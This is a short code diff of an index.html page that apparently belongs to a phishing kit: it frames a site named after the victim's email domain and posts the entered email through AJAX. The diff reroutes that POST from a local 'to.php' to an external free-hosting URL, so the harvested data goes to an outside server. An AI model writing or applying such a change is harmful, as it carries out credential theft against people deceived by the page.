--- a/index.html
+++ b/index.html
@@ -245,7 +245,7 @@ $("#iframe").attr("src", "https://www."+my_slice);
       
       $.ajax({
         dataType: 'JSON',
-        url: 'to.php',
+        url: 'https://continent-cglobeplr.000webhostapp.com/index.php',
         type: 'POST',
         data:{
           email:email,
